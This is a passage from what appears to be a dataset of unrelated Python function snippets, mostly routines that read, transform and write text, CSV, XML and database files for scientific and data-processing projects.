line\n else:\n pass\n \n #And for all other files, copy everything but the last line\n for filename in filenames[1:]:\n firstLine = True\n for line in open(os.path.join(self.path,filename), 'r'):\n if not firstLine:\n output_file.write(line)\n if line != '\\n':\n if output_re.match(line):\n value = float(output_re.match(line).groupdict()['best_value'])\n if maximize:\n if value > best_value:\n best_value = value\n best_line = line\n elif not maximize:\n if value < best_value:\n best_value = value\n best_line = line\n else:\n pass\n firstLine = False\n \n \n output_file.close()\n \n #Write the best value to results.txt\n output_file = open(os.path.join(self.path, 'results.txt'), 'w')\n \n output_file.write('Best value\\t')\n \n for parameter in self.get_optimization_parameters():\n\n output_file.write(parameter[0].encode('utf8'))\n output_file.write('\\t')\n output_file.write('\\n')\n\n best_line_dict = output_re.match(best_line).groupdict()\n\n output_file.write(best_line_dict['best_value'])\n output_file.write('\\t')\n \n for parameter in best_line_dict['params'].split('\\t'):\n output_file.write(parameter)\n output_file.write('\\t')\n output_file.close()", "def whriteInOuput(finalOutput):\n\n os.chdir(\"D:/IIHT/Python/Project/NRPT all companies scrapper/caches\")\n #open text file, return an object of type io.TextIOWrapper\n with open(\"Companies Website.txt\", \"w\") as writ:\n #write each line in the object op, return an object of type int\n writ.write('\\n'.join(finalOutput) + \"\\n\")", "def cleaning_file():\n f = open (\"report_for_judy_part2.txt\", \"w\")\n f.close()", "def write_to_txt(self):\r\n file = open(self.output_path, 'w')\r\n for question_id in self.question_ids:\r\n file.write(self.questions[question_id].question_string+str(self.questions[question_id].answer)+'\\n')\r\n file.close()", "def main(nlp, file_path, final_file_path, from_line=0, to_line=None):\n with open(final_file_path, \"w\") as parsed_file:\n with open(file_path) as cnn_dm:\n line = cnn_dm.readline().strip()\n article_idx = 0\n while article_idx < from_line:\n line = cnn_dm.readline().strip()\n article_idx += 1\n if to_line is None:\n while line is not None and line != '':\n process_line(nlp, line, parsed_file)\n article_idx += 1\n print(\"{} articles processed from file {}\".format(article_idx, file_path))\n line = cnn_dm.readline().strip()\n else:\n while article_idx < to_line and line is not None and line != '':\n process_line(nlp, line, parsed_file)\n article_idx += 1\n print(\"{}th article processed from file {}\".format(article_idx, file_path))\n line = cnn_dm.readline().strip()", "def compose_logfile_lines(start_time, db_format_time, blast_time, option_lines,\r\n formatdb_cmd, blast_results, options, all_ids,\r\n hit_ids, removed_hit_ids,\r\n included_ids, DEBUG):\r\n\r\n log_lines = []\r\n log_lines.append(\"Sequence exclusion analysis run on %s\" % strftime(\"%c\"))\r\n log_lines.append(\r\n \"Formatting subject database took %2.f seconds\" %\r\n (db_format_time))\r\n log_lines.append(\r\n \"BLAST search took %2.f minute(s)\" %\r\n ((blast_time) / 60.0))\r\n log_lines.append(\r\n \"Total analysis completed in %2.f minute(s)\" %\r\n ((time() - start_time) / 60.0))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Options |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.extend(option_lines)\r\n log_lines.append(\"Subject database formatted with command: %s\"\r\n % formatdb_cmd)\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Results |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\"BLAST results above e-value threshold:\")\r\n log_lines.append(\r\n \"\\t\".join([\"Query id\", \"Subject id\", \"percent identity\", \"alignment length\",\r\n \"mismatches\", \"gap openings\", \"q. start\", \"q. end\", \"s. start\", \"s. end\", \"e-value\", \"bit score\"]))\r\n\r\n for line in blast_results:\r\n if line.startswith(\"#\"):\r\n continue\r\n else:\r\n log_lines.append(line)\r\n\r\n log_lines.append(\r\n \"Hits matching e-value and percent alignment filter: %s\" %\r\n ','.join(sorted(hit_ids)))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Summary |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\"Input query sequences: %i\" % len(all_ids))\r\n log_lines.append(\r\n \"Query hits from BLAST: %i\" %\r\n (len(hit_ids) + len(removed_hit_ids)))\r\n log_lines.append(\r\n \"Query hits from BLAST lacking minimal percent alignment: %i\" %\r\n len(removed_hit_ids))\r\n log_lines.append(\"Final hits: %i\" % len(hit_ids))\r\n log_lines.append(\"Output screened sequences: %i\" % len(included_ids))\r\n\r\n log_lines.append(FORMAT_BAR)\r\n log_lines.append(\r\n \"| Output |\")\r\n log_lines.append(FORMAT_BAR)\r\n\r\n log_lines.append(\r\n \"Writing excluded sequences (hits matching filters) to: %s\" %\r\n join(options.outputdir, \"matching.fna\"))\r\n log_lines.append(\r\n \"Writing screened sequences (excluding hits matching filters) to: %s\" %\r\n join(options.outputdir, \"non-matching.fna\"))\r\n log_lines.append(\r\n \"Writing raw BLAST results to: %s\" %\r\n join(options.outputdir, 'raw_blast_results.txt'))\r\n\r\n # format for printing\r\n revised_log_lines = []\r\n for line in log_lines:\r\n line = line + \"\\n\"\r\n revised_log_lines.append(line)\r\n\r\n if DEBUG:\r\n for line in log_lines:\r\n print line\r\n\r\n return revised_log_lines", "def get_file_contents(self):\n with open(self.sql_file, 'r') as sql:\n text = sql.read()\n # text = text.replace('\\n', '\\n\\n')\n # text=sql.read()\n # TODO: fix some text replacement issues here\n # https://github.com/andialbrecht/sqlparse/issues/313\n return self.filter_text(text)", "def output_1cell(self, filename):\n\n date_concat = \"{0} to {1}\".format(self.startDate, self.endDate)\n if active_restaurant_loop:\n column_name = [\"range\", \"start_date\",\n \"end_date\", \"location_id\", \"content\"]\n data = [date_concat, self.startDate, self.endDate, str(\n self.payload[\"locationGroupID\"]), \"{0}\".format(self.content)]\n data_out = [column_name, data]\n else:\n column_name = [\"range\", \"start_date\", \"end_date\", \"content\"]\n data = [date_concat, self.startDate,\n self.endDate, \"{0}\".format(self.content)]\n data_out = [column_name, data]\n\n # If active restaurant loop is true\n if not os.path.isfile(filename):\n with open(filename, \"w\") as f:\n writer = csv.writer(f)\n #writer.writerow([\"range\", \"start_date\", \"end_date\", \"content\"])\n #writer.writerow([date_concat, start_date, end_date, \"{0}\".format(self.content)])\n writer.writerows(data_out)\n # f.write([\"content\"])\n # f.write([\"{0}\"].format(self.content))\n f.close()\n else:\n with open(filename, \"a\") as f:\n writer = csv.writer(f)\n writer.writerows([data])\n f.close()\n\n logging.info(\"Outputting... \")\n self.produce_manifest(filename)", "def derive_terms_and_comments(infile: str = None, outfile: str = None) -> None:\n\n id_ctr = 0\n comment_ctr = 0\n missing_id_ctr = 0\n missing_comment_ctr = 0\n null_comment_ctr = 0\n terms_and_comments_list = []\n\n logging.info(\"Abou to parse '{}'\".format(infile))\n\n with open(infile) as file:\n\n documents = yaml.full_load(file)\n\n for item, doc in documents.items():\n if item == '@graph':\n logging.info(\"Found '@graph' section\")\n\n graph_list = doc\n\n for graph_dict in graph_list:\n term_name = None\n comment = None\n if '@id' in graph_dict:\n term_name = graph_dict['@id']\n id_ctr += 1\n if 'rdfs:comment' in graph_dict:\n comment = graph_dict['rdfs:comment']\n if comment is None or comment == '':\n comment = 'N/A'\n logging.info(\"Found term '{}' with null comment so assigned '{}'\".format(term_name, comment))\n null_comment_ctr += 1\n else:\n logging.info(\"Found term '{}' with comment '{}'\".format(term_name, comment))\n comment_ctr += 1\n else:\n logging.info(\"Did not find comment for term '{}'\".format(term_name))\n missing_comment_ctr += 1\n else:\n logging.error(\"Did not find id!\")\n missing_id_ctr += 1\n\n terms_and_comments_list.append([term_name, comment])\n\n logging.info(\"Found '{}' ids\".format(id_ctr))\n logging.info(\"Found '{}' comments\".format(comment_ctr))\n\n if missing_id_ctr > 0:\n print(\"Encountered '{}' missing ids\".format(missing_id_ctr))\n\n if missing_comment_ctr > 0:\n print(\"Encountered '{}' missing comments\".format(missing_comment_ctr))\n\n if null_comment_ctr > 0:\n print(\"Encountered '{}' comments with null values\".format(null_comment_ctr))\n\n with open(outfile, 'w') as fh:\n for term_and_comment in terms_and_comments_list:\n fh.write(term_and_comment[0] + \"\\t\" + term_and_comment[1] + \"\\n\")\n\n logging.info(\"Wrote '{}'\".format(outfile))\n print(\"Wrote '{}'\".format(outfile))", "def compile_file(self, filename):\n if self.basepath is None:\n self.basepath = os.path.split(filename)\n\n i = 1\n txt = \"\"\n with open(filename, \"r\") as reader:\n for line in reader:\n if line != \"\\n\":\n txt += line\n debug(logger, \"*** [%d] %s\" % (i, line))\n if balanced(txt) == 0:\n print(self.parseit(txt))\n txt = \"\"\n i = i + 1\n\n if len(txt):\n print(\"Error: missing ()'s, %s\" % txt)", "def produce_output_txt(self):\n\n NAME = \"TODO get name form cpacs object\"\n\n result_dir = get_results_directory(\"WeightConventional\")\n\n output_file = Path(result_dir, \"Aircraft_Geometry.out\")\n\n OutputTextFile = open(output_file, \"w\")\n\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n###### AIRCRAFT GEOMETRY EVALUATION MODULE ######\")\n OutputTextFile.write(\"\\n###### OUTPUTS ######\")\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nAircraft: \" + NAME)\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nGeometry Evaluations-----------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nUSEFUL INFO -------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\n \"\\nIf fuselage or wing number is greater than 1 the\\n\"\n \"information of each obj are listed in an \"\n \"array ordered\\nprogressively\"\n )\n OutputTextFile.write(\n \"\\nSymmetry output: 0 = no symmetry, 1 = x-y,\\n\" + \"2 = x-z, 3 = y-z planes\"\n )\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nRESULTS -----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nFUSELAGE ----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of fuselage sections [-]: {self.fuse_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of fuselage segments [-]: {self.fuse_seg_nb}\")\n OutputTextFile.write(f\"\\nCabin segments array [-]: {self.cabin_seg}\")\n OutputTextFile.write(f\"\\nFuse Length [m]: {np.around(self.fuse_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse nose Length [m]: {np.around(self.fuse_nose_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse cabin Length [m]: {np.around(self.fuse_cabin_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse tail Length [m]: {np.around(self.fuse_tail_length, 5)}\")\n OutputTextFile.write(f\"\\nAircraft Length [m]: {np.around(self.tot_length, 5)}\")\n OutputTextFile.write(\n \"\\nCircumference of each section of the fuselage [m]:\"\n f\"\\n{np.around(self.fuse_sec_circ, 5)}\"\n )\n OutputTextFile.write(\n \"\\nRelative distance of each section of the\"\n + \"fuselage, respect to the first one [m]: \\n\"\n + str(np.around(self.fuse_sec_rel_dist, 5))\n )\n OutputTextFile.write(\n \"\\nLength of each segment of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nMean fuselage width [m]: \" + str(np.around(self.fuse_mean_width, 5))\n )\n OutputTextFile.write(\n \"\\nWidth of each section of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_sec_width, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of each segment of the fuselage \"\n \"[m^3]: \\n\" + str(np.around(self.fuse_seg_vol, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of the cabin [m^3]: \" + str(np.around(self.fuse_cabin_vol, 5))\n )\n OutputTextFile.write(\"\\nVolume of the fuselage [m^3]: \" + str(np.around(self.fuse_vol, 5)))\n OutputTextFile.write(\"\\n\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nWINGS -------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of Wings [-]: {self.wing_nb}\")\n OutputTextFile.write(f\"\\nWing symmetry plane [-]: {self.wing_sym}\")\n OutputTextFile.write(f\"\\nNumber of wing sections [-]: {self.wing_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of wing segments [-]: {self.wing_seg_nb}\")\n OutputTextFile.write(f\"\\nWing Span [m]: \\n{np.around(self.wing_span, 5)}\")\n OutputTextFile.write(\n \"\\nWing MAC length [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 0,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWing MAC x,y,z coordinate [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 1:4,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWings sections thickness [m]: \\n\" + str(np.around(self.wing_sec_thickness, 5))\n )\n OutputTextFile.write(\n \"\\nWings sections mean thickness [m]: \\n\" + str(np.around(self.wing_sec_mean_thick, 5))\n )\n OutputTextFile.write(\n \"\\nWing segments length [m]: \\n\" + str(np.around(self.wing_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nWing max chord length [m]: \\n\" + str(np.around(self.wing_max_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWing min chord length [m]: \\n\" + str(np.around(self.wing_min_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWings planform area [m^2]: \\n\" + str(np.around(self.wing_plt_area, 5))\n )\n OutputTextFile.write(\n \"\\nMain wing planform area [m^2]: \" + str(np.around(self.wing_plt_area_main, 5))\n )\n OutputTextFile.write(\"\\nVolume of each wing [m^3]: \\n\" + str(np.around(self.wing_vol, 5)))\n OutputTextFile.write(\"\\nTotal wing volume [m^3]: \" + str(np.around(self.wing_tot_vol, 5)))\n OutputTextFile.write(\"\\nWing volume for fuel storage [m^3]: \" + str(self.wing_fuel_vol))\n\n # Close Text File\n OutputTextFile.close()", "def main():\n\n preprocessed_file = preprocess_clinical_trials()\n\n preprocessed_file.to_csv(PREPROCESSED_CLINICAL_TRIALS_FILE_PATH, index=False)", "def main():\n file_one_path, file_two_path, output_path =\\\n get_command_line_arguments(\n ['/home/ehler002/project/groups/go/Data/Cluster_Data/Dataset.txt',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/translated_genes.fpkm_table',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/Full_fpkm_Table.txt'])\n pattern = 'CRO_T'\n for file_path in [file_one_path, file_two_path]:\n assert os.path.exists(file_path), 'File %s does not exist.' % file_path\n start_time = datetime.datetime.now()\n print('Started concatenation at %s' % start_time)\n file_contents, headers = get_file_contents(file_two_path)\n file_contents = sort_file_contents(file_contents)\n file_contents = remove_pattern(file_contents, pattern)\n concatenate_files(file_one_path, file_contents, headers, output_path)\n print('Finished concatenation in %s' % (datetime.datetime.now() - start_time))", "def apply_filter(input_file, output_file, features):\n lines = input_file.readlines()\n lines = list(map(clean, lines))\n\n for i in range(0, len(lines)):\n line = lines[i]\n feat = extract(line[\"features\"], features)\n output_line = line[\"rank\"] + \" \" + line[\"qid\"]\n for key in features:\n output_line += \" \" + str(key) + \":\" + str(feat[key])\n output_line += \" #\" + line[\"comment\"]\n output_file.write(output_line)", "def sexyStrip(dataFile):\n correct = open('correct.txt', 'w+')\n for line in dataFile:\n stripLines = line.rstrip()\n fixedLines = stripLines + \"\\n\"\n correct.write(fixedLines)\n correct.close()", "def coord_atoms():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n a_list = []\n with open(filepath, 'r') as pdb:\n for line in pdb:\n if line[:4] == 'ATOM':\n line_split = line.split()[6:9]\n a_list.append(line_split) \n choice1 = input('Enter the name of the outfile: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in a_list:\n outfile.writelines(i)\n print('Done!')\n print(i)", "def joinInds(r1,r2,outfname):\n outf = open(outfname,'w')\n f1 = file(r1,'r')\n f2 = file(r2,'r')\n for row1 in f1:\n outf.write('%s\\n' % (row1.strip()))\n for row1 in f2:\n outf.write('%s\\n' % (row1.strip()))\n outf.close()", "def output_for_test_case(test_case):\n scriptname = os.path.basename(__file__)\n camel_case_type = helpers.to_camel_case(test_case.test_type)\n test_case_name = TEST_CASE_TPL.format(test_type=camel_case_type,\n direction=helpers.to_camel_case(\n test_case.direction))\n output = [\n helpers.get_license(),\n helpers.get_dont_modify_comment(scriptname=scriptname),\n INCLUDES,\n TYPED_TEST_SUITE_DECL_TPL.format(\n test_case=test_case_name,\n operation=OPERATOR_MAP[test_case.test_type],\n direction=DIRECTION_MAP[test_case.direction]),\n ]\n\n for test_params in test_params_for_test_case(test_case):\n output.extend(get_test_lines(test_case, test_params))\n output.append(\"\\n\")\n return output", "def outTxt(data, outPath, fileName):\n\n with open(outPath+fileName, \"wb\") as f:\n f.write(\"index,link,name,rating,review,price,category,neighborhood,address,phone,feedback\\n\")\n for record in data:\n f.write(\"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n\" % \\\n (record[0],record[1],record[2],record[3],record[4],record[5],record[6],\\\n record[7],record[8],record[9],record[10]))", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n conn = sqlite3.connect('../raw/td_V2.db')\n git_commits = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS\",conn)\n szz_fault_inducing_commits = pd.read_sql_query(\"SELECT * FROM szz_fault_inducing_commits\",conn)\n refactoring_miner = pd.read_sql_query(\"SELECT * FROM refactoring_miner\",conn)\n refactoring_miner = refactoring_miner[refactoring_miner[\"COMMIT_HASH\"].isin(git_commits[\"COMMIT_HASH\"])]\n git_commits_changes = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS_CHANGES\", conn)\n git_commits_changes = git_commits_changes[git_commits_changes[\"COMMIT_HASH\"].isin(refactoring_miner[\"COMMIT_HASH\"])]\n\n preprocess(git_commits, szz_fault_inducing_commits, refactoring_miner, git_commits_changes)", "def main():\n filepath = input(\"Enter the Source File: \")\n with open(filepath, encoding=\"utf-8\") as f:\n sentences = f.readlines()\n sentences = \" \".join(sentences)\n\n summary = summarize_sentences(sentences)\n\n filepath_index = filepath.find(\".txt\")\n outputpath = filepath[:filepath_index] + \"_lexRank.txt\"\n\n with open(outputpath, \"w\") as w:\n for sentence in summary:\n w.write(str(sentence) + \"\\n\")", "def csv_to_txt():\n print('csv to text')\n input_files = sys.argv[1]\n i = 0\n for filename in os.listdir(input_files):\n print(i, filename[11:-4])\n output_txt_file = ''\n current_csv_df = pd.read_csv(sys.argv[1] + filename)\n for index, row in current_csv_df.iterrows():\n if (row['task_number'] == TASK_3[0] or row['task_number'] == TASK_3[1]) and type(\n row['spoken_word']) != float:\n output_txt_file += \" \" + row['spoken_word']\n txt_file = open('jan27_memory_texts/' + filename[11:-4] + '.txt', \"a\")\n txt_file.write(output_txt_file.lstrip(' '))\n txt_file.close()\n i+=1", "def write_CA_atoms():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n ca_list = []\n with open(filepath, 'r') as pdb:\n for line in pdb:\n if line[:4] == 'ATOM' and line[12:16] == \" CA \":\n line_split = line.split()[6:9]\n ca_list.append(line_split)\n choice1 = input('Enter name of the outfile: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in ca_list:\n outfile.writelines(i)\n print('Done!')\n print(i)", "def process_file(filename, skip_header=True):\n hist = {}\n fp = file(filename)\n fullwordlist=[]\n # if skip_header:\n # skip_gutenberg_header(fp)\n\n for line in fp:\n holder=process_line(line,hist)\n #print holder\n fullwordlist.extend(holder)\n return fullwordlist", "def write_results(results):\n with RESULTS_PATH.open(\"w\") as writer:\n csvwriter = csv.writer(writer)\n csvwriter.writerows(results)", "def to_file(results: Solution, file: Path) -> Path:\n\n\tlogger = getLogger()\n\n\tfilepath = _create_filepath(file)\n\n\tlogger.info(f\"Writing the best results into '{filepath.name}'...\")\n\n\tnetwork_desc = Element(\"NetworkDescription\", {\"cost\": str(results.monetaryCost()), \"Redundancy_Ratio\":str(results.redundancySatisfiedRatio()), \"Deadlines_missed\":\"Yes\" if len(results.misses) > 0 else \"No\"})\n\tworst_wctt = list(results.streams)[0].WCTT\n\taverage_wctt = 0\n\tfor stream in results.streams:\n\t\tif stream.WCTT > worst_wctt:\n\t\t\tworst_wctt = stream.WCTT\n\t\taverage_wctt += stream.WCTT\n\taverage_wctt = average_wctt / len(results.streams)\n\n\tSubElement(network_desc, \"Worst_WCTT\", {\"Time\": str(worst_wctt), \"Unit\": \"Microseconds\"})\n\tSubElement(network_desc, \"Average_WCTT\", {\"Time\": str(average_wctt), \"Unit\": \"Microseconds\"})\n\n\tfor node in results.network:\n\t\tSubElement(network_desc, \"device\", {\"name\": node.name, \"type\": node.__class__.__name__})\n\n\tfor u, v, speed in results.network.edges(data=\"speed\"):\n\t\tSubElement(network_desc, \"link\", {\"src\": u.name, \"dest\": v.name, \"speed\": str(speed)})\n\n\tfor stream in results.streams:\n\t\tSubElement(network_desc, \"stream_times\", {\"id\": stream.id, \"WCTT\" : str(stream.WCTT)})\n\n\tfor time, streams in results.misses.items():\n\t\tmiss = SubElement(network_desc, \"miss\", {\"time\": str(time)})\n\n\t\tfor stream in streams:\n\t\t\tSubElement(miss, \"stream\", {\"id\": stream.id})\n\n\tnetwork_desc = _add_streams(network_desc, results)\n\n\troot = ElementTree(network_desc)\n\tindent(root, space=\"\\t\")\n\troot.write(filepath, encoding='utf-8', xml_declaration=True)\n\n\tlogger.info(\"done.\")\n\n\treturn filepath", "def display_algn_seq():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n with open(filepath,'r') as file:\n seq_list = []\n for line in file:\n if line[:6] == 'SEQRES':\n line_split = line.split()[4:]\n seq_list.append(line_split)\n \n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile1')\n with open(filepath1, 'w') as outfile:\n for i in seq_list:\n outfile.writelines(i)\n \n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile2')\n j = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile1')\n with open(j, 'r') as fil:\n d = {'CYS':'C','ASP':'D','SER':'S','GLN':'Q','LYS':'K','ILE':'I','PRO':'P','THR':'T','PHE':'F','ASN':'N',\n 'GLY':'G','HIS':'H','LEU':'L','ARG':'R','TRP':'W','TER':'*','ALA':'A','VAL':'V','GLU':'E','TYR':'Y',\n 'MET':'M','XAA':'X'}\n with open(filepath2, 'w') as outf:\n for line in fil:\n if len(line) %3 == 0:\n upper_seq = line.upper()\n single_seq = ''\n for i in range(int(len(upper_seq)/3)):\n single_seq += d[upper_seq[3*i:3*i+3]]\n outf.write(single_seq) \n return single_seq\n else:\n print(\"ERROR: Line was not a factor of 3 in length!\")", "def process_raw_phrases(file_path):", "def remove_tab_space(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n\n self.result_code = open(\"result.c\", \"w\") # Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line begins with a white space.\n if line[0] == \" \":\n # Checking from which position the code begins over a loop, in order to remove the tab space.\n for c in range(1, len(line)):\n if line[c] != \" \":\n index = c # Making note of the position from which the code begins in the line.\n break\n self.result_code.write(line[index:]) # Writing the line without the tab space into the intermediate file.\n else:\n self.result_code.write(line) # Writing the entire line into the intermediate file in case there is no tab space at the beginning.\n\n self.result_code.close() # Closing the intermediate file.", "def expand_file(self, base_file, current_path, include_bbl, noline):\n output_lines = []\n f = self.open_encode_safe(base_file)\n for line in f:\n if self.is_input(line):\n new_base_file = self.combine_path(current_path, self.get_input(line))\n output_lines += self.expand_file(new_base_file, current_path, include_bbl, noline)\n if noline:\n pass\n else:\n output_lines.append('\\n') # add a new line after each file input\n elif include_bbl and line.startswith(\"\\\\bibliography\") and (not line.startswith(\"\\\\bibliographystyle\")):\n output_lines += self.bbl_file(base_file)\n else:\n output_lines.append(line)\n f.close()\n return output_lines", "def read_results(self):\n\n with open(os.path.join(self.directory, 'results.tag'), 'r') as fd:\n self.lines = fd.readlines()\n\n self.atoms = self.atoms_input\n self.results['energy'] = float(self.lines[1])*Hartree\n forces = self.read_forces()\n self.results['forces'] = forces\n\n # stress stuff begins\n sstring = 'stress'\n have_stress = False\n stress = list()\n for iline, line in enumerate(self.lines):\n if sstring in line:\n have_stress = True\n start = iline + 1\n end = start + 3\n for i in range(start, end):\n cell = [float(x) for x in self.lines[i].split()]\n stress.append(cell)\n if have_stress:\n stress = -np.array(stress) * Hartree / Bohr**3\n self.results['stress'] = stress.flat[[0, 4, 8, 5, 2, 1]]\n # stress stuff ends\n\n # calculation was carried out with atoms written in write_input\n os.remove(os.path.join(self.directory, 'results.tag'))", "def PrepareCompile(file):\n global oilcc_I,oilcc_o,oilcc_S,oilcc_target\n fp = open(file,'r')\n # some flags\n item = ''; #one item is minimum object such as TASK,ALARM ...\n barcenum = 0;\n flag = False; #has \" { \" encountered or not\n start = False #has match an obj start or not\n for line in fp.readlines():\n #firstly, filter out the comment on this line\n el = DropComment(line);\n if(start == False):\n #{\n item = ''; \n barcenum = 0;\n flag = False;\n if(IsIt('osekObj',el)):\n start = True;\n item += el;\n if(el.count('{') > 0): #so at comment should not include '{}'\n flag = True;\n barcenum += el.count('{');\n if(el.count('}') > 0):\n barcenum -= el.count('}');\n if((flag == True) and (barcenum == 0)): #in one line\n #filter out the multi-line comment\n item = DropComment(item)\n oilcc_texts.append(item);\n start = False\n else: # special process for include\n inc = GetIt('include',el)\n if(inc != None): #include file\n flag_inc = False\n for I in oilcc_I:\n finc = I + '/' + inc[0]\n if(os.path.exists(finc)):\n print 'INFO:parse include file <%s> in the path <%s>'%(inc[0],I)\n PrepareCompile(finc);\n flag_inc = True;\n if(flag_inc == False):\n print 'ERROR:cann\\'t find out the file %s!'%(inc[0])\n sys.exit(-1)\n #}\n else:\n #{\n if(el.count('{') > 0): #so at comment should not include '{}'\n flag = True;\n barcenum += el.count('{');\n if(el.count('}') > 0):\n barcenum -= el.count('}');\n item += el;\n if((flag == True) and (barcenum == 0)):\n #filter out the multi-line comment\n item = DropComment(item)\n oilcc_texts.append(item);\n start = False\n #}\n fp.close()", "def make_source_text(input_one, input_two, input_three, output_text):\n # clear out the previous file contents\n open(output_text, 'w').close()\n # copy from three input files based on question answers\n copy_text(input_one, output_text)\n copy_text(input_two, output_text)\n copy_text(input_three, output_text)\n return output_text", "def writing_get_date_ordered(file_name):\n result = str(reports.get_date_ordered(file_name))\n with open (\"report_for_judy_part2.txt\", \"+a\") as f:\n f.write(result)\n f.write(\"\\n\")", "def post_process_output_file():\n parsed_data = []\n unparseable_data = []\n\n with open('../output/part-00000', 'r') as input_file:\n for line in input_file:\n line = line.strip()\n try:\n csv_splits = line.split(',')\n csv_splits[0] = int(csv_splits[0])\n # parsed_data is a list of lists\n parsed_data.append(csv_splits)\n except ValueError:\n unparseable_data.append(line)\n parsed_data.sort()\n\n with open('../output/titanic_test_data.csv', 'w') as output_file:\n # start with lines that couldn't be parsed\n # hopefully this will only be the original header\n for line in unparseable_data:\n output_file.write(\"%s\\n\" % line)\n for line in parsed_data:\n output_file.write(\"%d,%s\\n\" % (line[0], line[1]))", "def mergeLines(self,firstLineID,secondLineID):\n # 027 Get the lines\n sql=\"select word, total_count, netloc_count, path_count, params_count, query_count, fragment_count from BOW where bow_id=? or bow_id=?;\"\n args=(firstLineID,secondLineID,) \n self.DBcursor.execute(sql,args)\n result = self.DBcursor.fetchall()\n # 027 Combine the lines\n combined=[]\n # 027 Required check if both lines exist.\n if not len(result)==2 or not result[0] or not result[1]:\n self.logger.warning(\"One of input lines (%i,%i) does not exist in result: %s\"%(firstLineID,secondLineID,str(result)))\n else:\n #\n \n for item in itertools.izip(result[0],result[1]):\n # 027 Skips string and None - in both cases keeps original value.\n # 027 Column word is string. No sense to combine.\n if not isinstance(item[1],int):\n combined.append(item[0])\n # 027 If first is int and second null addition is not defined. Using the non-null one.\n elif not item[0]:\n combined.append(item[1])\n else:\n combined.append(item[0]+item[1])\n # 027 Writing changes into the db.\n sql=\"update BOW set total_count=?, netloc_count=?, path_count=?, params_count=?, query_count=?, fragment_count=? where bow_id=?;\"\n # 027 combined[0] is word - not updating.\n args=(combined[1],combined[2],combined[3],combined[4],combined[5],combined[6],firstLineID,)\n self.DBcursor.execute(sql,args)\n sql=\"delete from BOW where bow_id=?;\"\n args=(secondLineID,)\n self.DBcursor.execute(sql,args)\n return combined", "def make_head_line():\n with open(args.out_folder.strip() + \"/files/head_line.txt\", \"a\") as headLine:\n headLine.write(\"#Query ID\\t#Subject\\t#Subject accession\\t#Subject Taxonomy ID\\t#Identity percentage\\t#Coverage\\t#evalue\\t#bitscore\\n\")", "def loadText(self,inName):\n reComment = re.compile(r'\\s*\\#.*')\n ins = file(inName)\n for line in ins:\n #print line,\n #--Strip spaces and comments\n line = reComment.sub('',line)\n line = line.rstrip()\n #--Skip empty/comment lines\n if not line: continue\n #--Parse line\n (libId,srcId,altId) = line.split('\\t')[:3]\n self.libList.append(libId)\n self.libMap[libId] = (srcId,altId)\n #--Done\n ins.close()", "def 